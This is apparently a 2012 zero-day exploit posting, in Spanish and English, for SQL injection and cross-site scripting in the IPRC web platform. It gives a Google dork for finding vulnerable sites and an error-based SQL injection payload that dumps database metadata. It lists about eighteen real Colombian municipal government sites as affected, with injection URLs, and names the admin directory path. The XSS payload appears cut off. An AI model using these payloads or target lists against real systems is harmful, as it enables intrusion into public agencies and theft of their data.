Archivo de la etiqueta: zerodays

IPRC – SQL InjecTion / Cross-Site Scripting

+————————————————-+
l # Author: Diego Asencio l
l # Twitter: @Diego_Asencio l
l # E-mail: diego.asencio@unillanos.edu.co l
l # WorkGroup: [!]nside [0]utside – T34M l
l # Twt_WG: @insid30utsid3 l
+————————————————-+

#################
# INFORMACION #
#################
####################################################################
# Exploit Title: IPRC – SQL InjecTion / Cross-Site Scripting
# Vendor Name: Internet Para La Rendicion de Cuentas
# Url Vendor: http://www.iprc.org.co
# Category: WebApps
# Risk: Critical
# GoogleDork: “index.shtml?apc=I-xx-1-&x=” [or] “sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D= ”
# 0day exploits : inside0utside.com INNOVATION SECURITY & RISK
####################################################################

#################
# 3XPL0IT #
#################
#####################################################################
# – [SQL] –
# http://www.%5BM/pio%5D-%5BDep/to%5D.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
#
# – [XSS] –
# http://www.%5BM/pio%5D-%5BDep/to%5D.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
#
# ( XpL SQL )
#
# 2192436 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
Count(table_name) of information_schema.tables where table_schema=0x64625F3835303130
#
# (XpL XSS )
#
# “>
#
# ——————————————————————
# [ SAMPLE’S WEBSITES AFFECTED (SQL && XSS) INJ3CTI0N ]
# _____________________________________________________________________
#
# # – SQL – #
# http://www.puertolopez-meta.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.aguazul-casanare.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.abejorral-antioquia.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.cantagallo-bolivar.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.caldono-cauca.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.belen-boyaca.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.istmina-choco.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.riodeoro-cesar.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.yopal-casanare.gov.co/index.shtml?apc=I-xx-1-&x=%5BSQL%5D
# http://www.sucre-cauca.gov.co /index.shtml?apc=I-xx-1-&x=[SQL]
# _____________________________________________________________________
# # – XSS – #
# http://www.caqueza-cundinamarca.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
# http://www.caracoli-antioquia.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
# http://www.caramanta-antioquia.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
# http://www.carepa-antioquia.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
# http://www.www.carmendecarupa-cundinamarca.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
# http://www.carolinadelprincipe-antioquia.gov.co /sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
# http://www.cartagenadelchaira-caqueta.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
# http://www.castillalanueva-meta.gov.co/sitio.shtml?apc=B1–&s=B&nocache=1&als%5Bvbuscar%5D=%5BXSS%5D
#
#####################################################################

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: Directory Admin : /apc-aa/admin/ ::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::

#############
# Greet’s #
####################################################################
# @Insid30utsid3
# @unillanos_ # 2012 # @SR_XAOC – @MAXIMUS_WELL – @MIKESOFT – @R4Z0R_BL4CK
####################################################################

0-DAY WEBAPPS